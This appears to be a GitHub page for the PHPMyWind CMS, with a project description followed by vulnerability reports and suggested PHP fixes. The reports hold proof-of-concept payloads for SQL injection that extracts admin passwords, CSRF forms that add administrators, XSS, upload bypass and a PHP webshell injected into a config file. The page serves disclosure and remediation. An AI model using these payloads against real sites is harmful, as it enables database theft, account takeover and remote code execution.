
phpmywind's Introduction

About it

PHPMyWind is a brand: a website-building engine developed on PHP+MySQL that conforms to W3C standards. It brings a series of efficient, mature enterprise website-building solutions, lets your information reach the people who need it quickly and in a healthier form, and lets you enjoy the smooth experience PHPMyWind gives you.

About us

We are members of the ** enterprise website-building industry, young people with many simple dreams. In our work we wanted a powerful development tool, one genuinely suited to building enterprise websites: flexible, fast and efficient. Sometimes we do not need overly elaborate features; sometimes we need strong support. That is how PHPMyWind came about. We like developing and find joy in it, but we do not just want to develop, we want to create something with its own character.

Design philosophy

We pursue speed, comfort and being as lightweight as possible. What PHPMyWind aims to do is simply to get closer and closer to the working habits of people in the ** website-building industry. In our eyes, PHPMyWind is more than a CMS. It is a set of underlying code, a toolbox, a kaleidoscope. Any project in our work can be completed by modifying it, provided we all have a foundation in PHP development. We will do everything we can to make the code and structure simple and easy to understand. Whatever you need, just take it!

We admit we are not perfect, but we keep working hard

The PHPMyWind front end and back end are developed entirely in native PHP code. The developers PHPMyWind mainly targets are those in the enterprise website-building industry. What we need is a CMS that is simple, fast, stable and easy to split into parts. Each site may have only a few sections, or the site's functions may be special and need customization, so the demand for modular functionality is very strong. We therefore summarised the points above as the needs enterprise website developers care about most, took them as the starting point, and followed them throughout development. We hope developers feel fast and comfortable while developing; that is what we pursue. PHPMyWind has been in development since 2010, four years now, and has been rewritten four times in that period; its structure and coding style have gradually matured. The system has many built-in classes and functions that greatly speed up development. Those who are not used to the system classes can also develop in PHP's native built-in way. Every front-end page only needs to call '/include/config.inc.php' at its top to initialise the system code and begin development. PHPMyWind provides the front end as a demonstration, which can also be used directly. You can regard PHPMyWind as a CMS core and build rich website projects on top of it.

phpmywind's People

Contributors

duyueping, gaozhifeng, zhuzhongchao


phpmywind's Issues

SQL injection exists in many places in PHPMyWind v5.6

Product Homepage: http://phpmywind.com/
hello!
I found a serious SQL injection vulnerability in the backend management system (/admin/admin_save.php) of PHPMyWind v5.6

This vulnerability allows low-privilege site administrators to gain access to super-administrator accounts and passwords.

Vulnerability validation:
First, there are three types of administrators in the current system: super administrators, site administrators, and article publishers.
Now log in to the backend management system as a site administrator and click "administrator management"; the "delete" function is the location of the vulnerability.
Its URL is http://127.0.0.1/admin/admin_save.php?action=del&id=4
POC
(1)
http://127.0.0.1/admin/admin_save.php?action=del&id=4%27

(2) Show the current database

http://127.0.0.1/admin/admin_save.php?action=del&id=4%20%20and%20id%20in%20(char(@`%27`),updatexml(1,concat(0x7e,(select%20database())),1),char(@`%27`))

(3) Query the super administrator password

http://127.0.0.1/admin/admin_save.php?action=del&id=4  and id in (char(@`'`),updatexml(1,concat(0x7e,(select password from pmw_admin limit 0,1)),1),char(@`'`))

This vulnerability allows you to query any data you want from the database.

I found an upload vulnerability (admin/upload_file_do.php, getshell) in version 5.6

1. Log in as admin.
2. Visit the website settings and add "PHP " (with a trailing space) to the upload types.
Because Windows will remove the space, this bypasses the suffix check.
3. Upload a PHP file with a name like info.PHP, adding a space to the filename.
You can see the upload succeeds.

4. Visit the link.
You can see the PHP code was executed.

Because at data/httpfile/upload.class.php you do not check the input filename,

trim(filename) can help you.

Author: [email protected]

version 5.6
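As an added example (not code from the PHPMyWind project or from the reporter), this is the filename normalisation the report asks for, taken a step further than trim(): trailing spaces and dots are stripped before the suffix check, the extension is compared case-insensitively against an allow-list, and the stored name is generated rather than taken from the user. ALLOWED_EXT and the function names are assumptions.

```php
<?php
// Added example, not PHPMyWind's own code: normalise an uploaded filename
// before the suffix check so the check sees what the filesystem will store.
// ALLOWED_EXT is an assumed allow-list; the project's real list may differ.
declare(strict_types=1);

const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

function safeUploadName(string $original): ?string
{
    // Keep only the base name: no directories, no traversal.
    $name = basename(str_replace('\\', '/', $original));
    // Strip what Windows silently drops when writing the file (trailing
    // spaces and dots) plus control characters and NUL bytes, so a name
    // like "info.PHP " is judged as "info.PHP", not as something else.
    $name = rtrim($name, " .\t\r\n\0");
    $name = preg_replace('/[\x00-\x1f]/', '', $name) ?? '';
    if ($name === '' || $name[0] === '.') {
        return null;
    }
    // Compare the extension case-insensitively and only against the
    // allow-list; "PHP", "Php", "phtml" and so on are all rejected.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // Never reuse the user's base name: generate a random one.
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

function storeUpload(string $tmpFile, string $original, string $destDir): ?string
{
    $safe = safeUploadName($original);
    if ($safe === null) {
        return null;
    }
    // Check the content really is an image, not only the name.
    if (@getimagesize($tmpFile) === false) {
        return null;
    }
    $dest = rtrim($destDir, '/') . '/' . $safe;
    return move_uploaded_file($tmpFile, $dest) ? $dest : null;
}

// Constructed inputs modelled on the report's scenario.
foreach (['info.PHP ', 'info.php.', 'photo.JPG', '../etc/x.png'] as $in) {
    printf("%-16s -> %s\n", json_encode($in), safeUploadName($in) ?? 'rejected');
}
```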

I found PHP code execution in /admin/web_config.php at version 5.6

hi:
I found PHP code execution in /admin/web_config.php at version 5.6
1. Login as admin
2. Open http://192.168.10.12/admin/default.php
3. At the watermark setting, input the payload:

Watermark text: input xxx'
Text color: input ;phpinfo();//

4. Submit and visit the watermark setting; you can see the PHP code execute.

Because the payload was written into /data/watermark.inc.php,

and watermark.inc.php is included by require_once, the PHP code executes.

Suggestion:
replace ' ,,;,(,)

Version: 5.6
Author: [email protected]

I hope you can fix it

CSRF vulnerability exists in PHPMyWind v5.6

Product Homepage: http://phpmywind.com/

Software link: https://github.com/gaozhifeng/PHPMyWind

Version: v5.6

The backend code writes the new user data to the database without authentication such as a token:

	if($dosql->GetOne("SELECT `id` FROM `$tbname` WHERE `username`='$username'"))
	{
		ShowMsg('用户名已存在!', '-1');
		exit();
	}


	$password  = md5(md5($password));
	$loginip   = '127.0.0.1';
	$logintime = time();

	$sql = "INSERT INTO `$tbname` (username, password, nickname, question, answer, levelname, checkadmin, loginip, logintime) VALUES ('$username', '$password', '$nickname', '$question', '$answer', '$levelname', '$checkadmin', '$loginip', '$logintime')";
	if($dosql->ExecNoneQuery($sql))
	{
		header("location:$gourl");
		exit();
	}

When the backend administrator clicks the malicious link, the backend will add an administrator user.

PoC:

<html>
<body>
<form action="http://127.0.0.1:9000/admin/admin_save.php" method="POST">
      <input type="hidden" name="username" value="admincsrf" />
      <input type="hidden" name="password" value="admin" />
      <input type="hidden" name="repassword" value="admin" />
      <input type="hidden" name="question" value="0" />
      <input type="hidden" name="answer" value="" />
      <input type="hidden" name="nickname" value="" />
      <input type="hidden" name="levelname" value="1" />
      <input type="hidden" name="checkadmin" value="true" />
      <input type="hidden" name="action" value="add" />
      <input type="submit" value="Submit request" />
</form>
<script>
    document.forms[0].submit();
</script>
</body>
</html>

A CSRF vulnerability that can add an administrator account

There is no Token authentication when adding administrator users.
/admin/admin_save.php
The core code is as follows:

if($action == 'add')
{
	if($cfg_adminlevel > 1 and $levelname == 1)
	{
		ShowMsg('非法的操作,不能创建超级管理员!', '-1');
		exit();
	}
	

	$password  = md5(md5($password));
	$loginip   = '127.0.0.1';
	$logintime = time();

	$sql = "INSERT INTO `$tbname` (username, password, nickname, question, answer, levelname, checkadmin, loginip, logintime) VALUES ('$username', '$password', '$nickname', '$question', '$answer', '$levelname', '$checkadmin', '$loginip', '$logintime')";
	if($dosql->ExecNoneQuery($sql))
	{
		header("location:$gourl");
		exit();
	}
}

After the administrator logs in, just click on the attack page and the administrative user will be added.
PoC:

<html>
<body>
<form name="form" method="post" action="http://localhost/phpmywind/admin/admin_save.php">
		<input type="hidden" name="username" value="csrf">
		<input type="hidden" name="password" value="123456">
		<input type="hidden" name="repassword" value="123456">
		<input type="hidden" name="question" value="0">
		<input type="hidden" name="levelname" value="1">
		<input type="hidden" name="checkadmin" value="true">
		<input type="hidden" name="action" value="add">
		<input type="submit" value="Submit request" />
</form>
</body>
 <script>
   setInterval("document.all.form.submit()",1)
 </script>
</html>
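As an added example (not code from the PHPMyWind project or from either reporter), this is the per-session anti-CSRF token that both CSRF reports above say admin_save.php lacks; the names csrf_token, csrfField() and requireValidCsrf() are assumptions.

```php
<?php
// Added example, not PHPMyWind's own code: the anti-CSRF token that both
// reports above say admin_save.php lacks. The token lives in the session, is
// embedded in the admin form as a hidden field, and is compared with
// hash_equals() before any state-changing action runs. The names csrf_token,
// csrfField() and requireValidCsrf() are assumptions.
declare(strict_types=1);

function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden input to render into every admin form (e.g. the add-admin form).
function csrfField(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Call at the top of admin_save.php, before the $action branches.
function requireValidCsrf(array $session, array $post, array $server): bool
{
    // Only a POST carries the token; a bare GET link must never change state.
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given);   // constant-time comparison
}

// Constructed scenario: the auto-submitting cross-site form from the reports
// sends username/levelname/action=add but cannot read the victim's token.
$session = [];
echo csrfField($session), "\n";     // what the genuine admin form would contain
$forged  = ['username' => 'csrf', 'levelname' => '1', 'action' => 'add'];
$genuine = $forged + ['csrf_token' => $session['csrf_token']];
$server  = ['REQUEST_METHOD' => 'POST'];
echo 'forged request accepted: ', var_export(requireValidCsrf($session, $forged, $server), true), "\n";
echo 'genuine request accepted: ', var_export(requireValidCsrf($session, $genuine, $server), true), "\n";
```

In the real application $session is $_SESSION; sending the session cookie with SameSite=Lax (session_set_cookie_params() accepts a samesite key since PHP 7.3) adds a second layer, since the browser then omits the cookie from cross-site form posts.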

Bug: V5.6 Cross Site Scripting Vulnerability

There is an XSS vulnerability in your latest version, v5.6

No security check in page phpmywind/admin/infolist_add.php

When I add a new article, I use "<script>alert(/xss/)</script>" as the title,
then go back to PHPMYWIND/admin/infolist.php;
the backend page executed a JavaScript script.

JavaScript is also executed on the main page.

Fix:

Strictly verify user input: you must perform strict checks and HTML escaping on all input (scripts, iframes, etc.). The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request, the variables in the HTTP request header, and so on.
Verify the data type and verify its format, length, scope, and content.
Validation is needed not only on the client side but also on the server side.
The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is encoded, the security check should be performed at the output points.

PHP Code Execution via WriteConfig() function

#Author: KietNA from 1nv1cta team, HPT CyberSecurity Center
#Submit date: 22/08/2021
#Condition: Admin user
#Version: v5.6
#Description:
Because the input is filtered in the WriteConfig() function without "<, >, ?, =, `, ...", the attacker can inject PHP code into the /include/config.cache.php file. The attacker can append ?> to close the PHP syntax and add new PHP functions.

In the /admin/site_save.php file

WriteF() function:

PoC:

In the config.cache.php file

Then go back to the .php files in the /admin/ directory to execute the code

Request

POST /admin/site_save.php HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Origin: http://172.16.0.12:2222
Connection: close
Referer: http://172.16.0.12:2222/admin/site_add.php
Cookie: PortalOpenEMR=BKEx0ZLJ9X41gReq-UHNt-aC0jHNPiQLUOf7FXckqCAumudg; OpenEMR=UwreHaTw9iqwJWXqAY3%2CWYkZgvA3wdVmymdC5QqiVC1H2scM; loader=loaded; admin_lang=cn; home_lang=cn; workspaceParam=users_index%7CMember; referurl=%2Findex.php%3Fm%3Duser%26c%3DUsers%26a%3Dcentre; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_IS_UPHTML=0; users_id=1; PHPSESSID=qhclrgdoah7rbv9l34fvj07h00
Upgrade-Insecure-Requests: 1

site_name=123&site_key=kietna?><?=`$_GET[0]`?><?&site_lang=testtest&webname=123&weburl=http%3A%2F%2F172.16.0.12%3A2222&webpath=123&webswitch=Y&action=add

Response

HTTP/1.1 200 OK
Date: Sun, 22 Aug 2021 07:54:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHP/7.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12942

<script type="text/javascript">window.top.location.reload();</script>
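As an added example (not code from the PHPMyWind project or from either reporter), this covers both the watermark.inc.php report and the WriteConfig() report above: the generated settings file is emitted with var_export() so a value cannot escape its string literal, which removes the need for the character blacklist the reports discuss. Function names and the cfg_* keys are assumptions.

```php
<?php
// Added example, not PHPMyWind's own code: writing a PHP settings file so a
// value can never break out of its string literal. Both reports above show
// values like xxx' / ;phpinfo();// and ?><?=...?> landing in a generated .php
// file by string concatenation. var_export() emits a quoted literal with
// ' and \ escaped, and inside a single-quoted string ?> is plain text.
declare(strict_types=1);

function renderConfig(array $settings): string
{
    $out = "<?php\n// generated file, do not edit\n";
    foreach ($settings as $name => $value) {
        // Variable names come from code, not the request, but check them
        // anyway so a stray key can never emit arbitrary PHP.
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', (string) $name)) {
            throw new InvalidArgumentException("bad setting name: $name");
        }
        if (!is_scalar($value) && $value !== null) {
            throw new InvalidArgumentException("non-scalar value for $name");
        }
        $out .= '$' . $name . ' = ' . var_export($value, true) . ";\n";
    }
    return $out;
}

function writeConfigAtomically(string $path, string $content): void
{
    // Write a temp file, then rename, so a concurrent require never reads
    // a half-written file.
    $tmp = $path . '.' . bin2hex(random_bytes(4)) . '.tmp';
    if (file_put_contents($tmp, $content, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $tmp");
    }
    if (!rename($tmp, $path)) {
        throw new RuntimeException("cannot replace $path");
    }
}

// Constructed inputs modelled on the payloads in the two reports.
$settings = [
    'cfg_watermark_text'  => "xxx'",
    'cfg_watermark_color' => ';phpinfo();//',
    'cfg_site_key'        => 'kietna?><?=`$_GET[0]`?><?',
];
$path = tempnam(sys_get_temp_dir(), 'cfg');
writeConfigAtomically($path, renderConfig($settings));
echo file_get_contents($path);
require $path;                      // defines the variables, runs nothing else
echo 'site_key stored as: ', $cfg_site_key, "\n";
unlink($path);
```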

page.php maybe has some vulnerability

When I visit the next three URLs, my code will be injected into the source code of the page at the location of the page-number area.
http://localhost/wind/newsshow.php?cid=4"onmouseover='FeGh(9201)&id=19
http://localhost/wind/news.php?"onmouseover='FeGh(9201)'bad="
http://localhost/wind/about.php?"onmouseover='B427(9671)'bad="

Then you can use the browser to check the source code of the page; you will find the payload code in the page-number area.

The vulnerability is caused by "$nowurl" in "page.class.php".

I found that admin/admin_save.php in PHPMyWind 5.6 has SQL injection.

I found a SQL injection vulnerability in the backend management system of PHPMyWind 5.6.
The relevant source code is as follows:

// Update administrator
else if($action == 'update')
{

	// The founder account's status may not be changed
	if($id == 1 and ($checkadmin != 'true' or $levelname != '1'))
	{
		ShowMsg('抱歉,不能更改创始账号状态!','-1');
		exit();
	}


	// Only a super administrator may modify a super administrator
	if($cfg_adminlevel > 1 and $levelname == 1)
	{
		ShowMsg('非法的操作,不能修改为超级管理员!', '-1');
		exit();
	}


	if($password == '')
	{
		$sql = "UPDATE `$tbname` SET nickname='$nickname', question='$question', answer='$answer', levelname='$levelname', checkadmin='$checkadmin' WHERE `id`=$id";
	}
	else
	{
		$oldpwd   = md5(md5($oldpwd));
		$password = md5(md5($password));

		$r = $dosql->GetOne("SELECT `password` FROM `#@__admin` WHERE `id`=$id");
		if($r['password'] != $oldpwd)
		{
			ShowMsg('抱歉,旧密码错误!','-1');
			exit();
		}

		$sql = "UPDATE `$tbname` SET password='$password', nickname='$nickname', question='$question', answer='$answer', levelname='$levelname', checkadmin='$checkadmin' WHERE id=$id";
	}

	if($dosql->ExecNoneQuery($sql))
	{
		header("location:$gourl");
		exit();
	}
}

All three SQL statements here are vulnerable, because the variable '$id' is not protected by single quotes.

Vulnerability validation:
First, enter this page with a super administrator account or a site administrator account,

and click the modify button.
Click submit, then use Burp to intercept and modify the variable $id for injection.

POC

AND id in (char(@`'`), updatexml(1,(concat(0x7e,(select password from pmw_member limit 0,1),0x7e)),1),char(@`'`))
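As an added example (not code from the PHPMyWind project or from either reporter), this is the fix both SQL-injection reports on this page point at: the del and update branches of admin_save.php interpolate the request's $id into `WHERE id=$id`; here the id is validated as a decimal integer and bound as a parameter. PDO with an in-memory SQLite table stands in for the project's own $dosql wrapper, and the column set is a constructed simplification of pmw_admin.

```php
<?php
// Added example, not PHPMyWind's own code: validate $id as an integer and
// bind it as a parameter, so the value can never alter the statement.
// Runs offline on an in-memory SQLite table named after the pmw_admin
// table in the reports; the column set is a constructed simplification.
declare(strict_types=1);

function parseAdminId(string $raw): int
{
    // Digits only: "4'", "4 and id in (...)" and "" are all rejected here,
    // before any SQL is built.
    if ($raw === '' || strlen($raw) > 10 || !ctype_digit($raw)) {
        throw new InvalidArgumentException('invalid administrator id');
    }
    return (int) $raw;
}

function deleteAdmin(PDO $db, string $rawId): int            // action=del
{
    $stmt = $db->prepare('DELETE FROM pmw_admin WHERE id = :id');
    $stmt->execute([':id' => parseAdminId($rawId)]);
    return $stmt->rowCount();
}

function updateAdminLevel(PDO $db, string $rawId, int $levelname): int   // action=update
{
    $stmt = $db->prepare('UPDATE pmw_admin SET levelname = :lvl WHERE id = :id');
    $stmt->execute([':lvl' => $levelname, ':id' => parseAdminId($rawId)]);
    return $stmt->rowCount();
}

// Constructed demo data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pmw_admin (id INTEGER PRIMARY KEY, username TEXT, levelname INTEGER)');
$db->exec("INSERT INTO pmw_admin VALUES (1, 'founder', 1), (4, 'siteadmin', 2)");

echo 'rows updated: ', updateAdminLevel($db, '4', 3), "\n";
echo 'rows deleted: ', deleteAdmin($db, '4'), "\n";
try {
    deleteAdmin($db, "4'");                  // the first probe from the report
} catch (InvalidArgumentException $e) {
    echo 'rejected before reaching SQL: ', $e->getMessage(), "\n";
}
```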

A strange situation occurred: the program suddenly reports "PHPMyWind安全警告:MySql Error!"

错误信息:连接数据库失败,可能数据库密码不对或数据库服务器出错!

软件版本号: 5.4 Beta

服务器版本: nginx/1.8.1 | 操作系统: Linux
PHP版本号: 7.1.0 | GDLibrary: 支持
MySql版本: 5.70 | ZEND支持: 支持
支持上传的最大文件:2M

The program has not been modified; the problem above suddenly appeared.

Bug: V5.5 Cross Site Scripting Vulnerability

There is an XSS vulnerability in your latest version, v5.5

In PHPMyWind_5.5/admin/templates/html/default.html:

2. Steps to reproduce:

Fix:

  1. Strictly verify user input: you must perform strict checks and HTML escaping on all input (scripts, iframes, etc.). The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request, the variables in the HTTP request header, and so on.
  2. Verify the data type and verify its format, length, scope, and content.
  3. Validation is needed not only on the client side but also on the server side.
  4. The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is encoded, the security check should be performed at the output points.
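As an added example (not code from the PHPMyWind project or from any of the reporters), this is the output-side escaping the three XSS reports on this page ask for: the article title shown in admin/infolist.php, the v5.5 template, and the $nowurl value in page.class.php. The function names h(), articleTitle() and pagerLink() are assumptions.

```php
<?php
// Added example, not PHPMyWind's own code: output-side escaping for the XSS
// reports. h() escapes for HTML text and attribute context; pagerLink()
// rebuilds the current URL from parsed parts rather than echoing a raw
// request URI value. The function names are assumptions.
declare(strict_types=1);

function h(string $s): string
{
    // ENT_QUOTES escapes ' as well as ", so the result is safe inside
    // single- or double-quoted attributes and in text nodes alike.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function articleTitle(string $title): string
{
    return '<li>' . h($title) . '</li>';
}

// A $nowurl-style pager link. The query string is re-encoded key by key with
// http_build_query(), then the whole href is HTML-escaped at output time.
function pagerLink(string $requestUri, int $page): string
{
    $parts = parse_url($requestUri) ?: [];
    $path  = $parts['path'] ?? '/';
    parse_str($parts['query'] ?? '', $query);
    $query['page'] = $page;
    $url = $path . '?' . http_build_query($query);
    return '<a href="' . h($url) . '">' . $page . '</a>';
}

// Constructed inputs copied from the reports' payloads.
echo articleTitle('<script>alert(/xss/)</script>'), "\n";
echo pagerLink('/wind/news.php?"onmouseover=\'FeGh(9201)\'bad="', 2), "\n";
echo pagerLink('/wind/newsshow.php?cid=4"onmouseover=\'FeGh(9201)&id=19', 2), "\n";
```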
